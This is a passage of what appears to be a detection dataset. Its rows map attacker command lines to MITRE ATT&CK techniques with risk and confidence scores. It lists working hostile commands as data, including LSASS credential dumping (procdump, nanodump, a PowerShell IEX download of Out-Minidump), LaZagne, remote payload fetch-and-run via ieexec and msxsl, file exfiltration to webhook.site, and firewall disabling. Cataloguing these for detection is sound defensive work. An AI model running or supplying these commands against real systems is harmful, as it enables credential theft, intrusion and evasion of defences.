T1218 |
High |
High |
| Microsoft.Workflow.Compiler.exe tests.xml results.xml |
63360b0151879d92a52531ca |
microsoft.workflow.compiler |
Defense Evasion |
T1127 |
High |
High |
| systeminfo /s [COMPUTER] /u [DOMAIN\USERNAME] /p [PASSWORD] |
63360b0151879d92a52531cb |
systeminfo |
Discovery |
T1082 |
Low |
Low |
| fsi.exe c:\path\to\test.fsscript |
63360b0151879d92a52531cc |
fsi |
Execution, Defense Evasion |
T1059, T1218 |
High |
High |
| DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile |
63360b0151879d92a52531cd |
DataSvcUtil |
Exfiltration |
T1567 |
High |
High |
| ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" |
63360b0151879d92a52531ce |
scriptrunner |
Command and Control, Defense Evasion |
T1105, T1202, T1218 |
High |
High |
| VisualUiaVerifyNative.exe |
63360b0151879d92a52531cf |
VisualUiaVerifyNative |
Defense Evasion |
T1218 |
Medium |
Medium |
| wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe |
63360b0151879d92a52531d0 |
wlrmdr |
Defense Evasion |
T1202 |
High |
High |
| winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" |
63360b0151879d92a52531d1 |
winword |
Command and Control |
T1105 |
High |
High |
| msxsl.exe customers.xml script.xsl |
63360b0151879d92a52531d2 |
msxsl |
Defense Evasion |
T1218 |
High |
High |
| msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xsl |
63360b0151879d92a52531d3 |
msxsl |
Defense Evasion, Command and Control |
T1218, T1105 |
High |
High |
| ieexec.exe http://x.x.x.x:8080/bypass.exe |
63360b0151879d92a52531d4 |
ieexec |
Command and Control, Defense Evasion |
T1105, T1218 |
High |
High |
| portqry -local |
63360b0151879d92a52531d5 |
portqry |
Discovery |
T1049 |
Low |
Low |
| portqry -n [IP Address] -e [Port] |
63360b0151879d92a52531d6 |
portqry |
Discovery |
T1049 |
Low |
Low |
| advanced_ip_scanner.exe /r:[IP-RANGE] |
63360b0151879d92a52531d7 |
Advanced IP Scanner |
Discovery |
T1018, T1135, T1046 |
Low |
High |
| advanced_ip_scanner.exe /s:ipranges.txt /f:results.txt |
63360b0151879d92a52531d8 |
Advanced IP Scanner |
Discovery |
T1018, T1135, T1046 |
Low |
High |
| psexec -accepteula \\* -r [SERVICE_NAME] -s -d [EXECUTABLE] -u [USER] -p [PASSWORD] |
63360b0151879d92a52531d9 |
PsExec |
Lateral Movement, Persistence, Privilege Escalation, Execution |
T1021.002, T1570, T1543.003, T1569.002 |
High |
High |
| psexec -accepteula @[File Containing Remote Hosts] -d cmd /c [CommandString] |
63360b0151879d92a52531da |
PsExec |
Lateral Movement, Persistence, Privilege Escalation, Execution |
T1021.002, T1570, T1543.003, T1569.002 |
High |
Medium |
| nanodump.x64.exe -w "%temp%\nanodump.dmp" |
63360b0151879d92a52531db |
nanodump |
Credential Access |
T1003.001 |
Critical |
High |
| pslist -accepteula \\[COMPUTER] |
63360b0151879d92a52531dc |
pslist |
Discovery |
T1057 |
Low |
Medium |
| fscan.exe -h 10.227.156.0/24 -nopoc -np -p 80,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,3389 |
63360b0151879d92a52531dd |
fscan |
Discovery, Reconnaissance |
T1018, T1595.002 |
High |
High |
| laZagne.exe all -oA -output [FILE] |
63360b0151879d92a52531de |
lazagne |
Credential Access |
T1555, T1555.001, T1555.003, T1555.004, T1003.001, T1003.004, T1003.005, T1003.007, T1003.008, T1552.001 |
Critical |
High |
| Get-Domain -Domain [DOMAIN] |
63360b0151879d92a52531df |
powersploit |
Discovery |
T1018 |
High |
High |
| Get-DomainDNSRecord -Domain [DOMAIN] |
63360b0151879d92a52531e0 |
powersploit |
Discovery |
T1018 |
High |
High |
| Get-Forest -Forest [FOREST] |
63360b0151879d92a52531e1 |
powersploit |
Discovery |
T1482 |
High |
High |
| Get-DomainComputer -SearchBase [BASE}] -LDAPFilter [FILTER] |
63360b0151879d92a52531e2 |
powersploit |
Discovery |
T1018 |
High |
High |
| adfind -f objectcategory=computer |
63360b0151879d92a52531e3 |
ADFind |
Discovery |
T1018, T1087.002 |
Medium |
High |
| adfind -f objectcategory=person |
63360b0151879d92a52531e4 |
ADFind |
Discovery |
T1018, T1087.002 |
Medium |
High |
| adfind -subnets -f objectCategory=subnet |
63360b0151879d92a52531e5 |
ADFind |
Discovery |
T1016 |
Medium |
High |
| adfind -gcb -sc trustdmp |
63360b0151879d92a52531e6 |
ADFind |
Discovery |
T1018, T1482 |
Medium |
High |
| adfind -sc computers_pwdnotreqd |
63360b0151879d92a52531e7 |
ADFind |
Discovery |
T1018 |
High |
High |
| procdump -accepteula -ma [LSASS_PID] [OUTPUT_FILE] |
63360b0151879d92a52531e8 |
ProcDump |
Credential Access |
T1003.001 |
High |
High |
| procdump -accepteula -r -ma [LSASS_PID] [OUTPUT_FILE] |
63360b0151879d92a52531e9 |
ProcDump |
Credential Access |
T1003.001 |
High |
High |
| procdump.exe -md calc.dll explorer.exe |
63360b0151879d92a52531ea |
ProcDump |
Defense Evasion |
T1202 |
High |
High |
| procdump.exe -md calc.dll foobar |
63360b0151879d92a52531eb |
ProcDump |
Defense Evasion |
T1202 |
High |
High |
| sharpshares.exe /threads 50 /ldap:all /filter:sysvol,netlogon,ipc$,print$ /outfile:test.txt |
63360b0151879d92a52531ec |
sharpshares |
Discovery |
T1135 |
High |
High |
| Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump |
63360b0151879d92a52531ed |
Out-Minidump |
Credential Access |
T1003.001 |
Critical |
High |
| ngrok.exe config add-authtoken [AUTH TOKEN REACTED] |
63360b0151879d92a52531ee |
ngrok |
Command and Control |
T1572, T1102 |
High |
High |
| ssas.exe authtoken [AUTH TOKEN REDACTED] |
63360b0151879d92a52531ef |
ngrok |
Command and Control |
T1572, T1102 |
High |
High |
| yum remove [APP] -y |
63360b0151879d92a52531f0 |
yum |
Defense Evasion |
T1562.001 |
Low |
Low |
| arp -a |
63360b0151879d92a52531f1 |
arp_linux |
Discovery |
T1018 |
Low |
Low |
| mv /usr/bin/[FILE] /usr/bin/[NEWNAME] |
63360b0151879d92a52531f2 |
mv |
Defense Evasion |
T1036.003 |
Low |
Low |
| iptables -F |
63360b0151879d92a52531f3 |
iptables |
Defense Evasion |
T1562.004 |
High |
High |
| ufw disable |
63360b0151879d92a52531f4 |
ufw |
Defense Evasion |
T1562.004 |
High |
High |
| systemctl stop [SERVICE] |
63360b0151879d92a52531f5 |
systemctl |
Impact |
T1489 |
Low |
Low |
| systemctl disable [SERVICE] |
63360b0151879d92a52531f6 |
systemctl |
Impact |
T1489 |
Low |
Low |
| apt-get remove [APP] -y |
63360b0151879d92a52531f7 |
apt-get |
Defense Evasion |
T1562.001 |
Low |
Low |
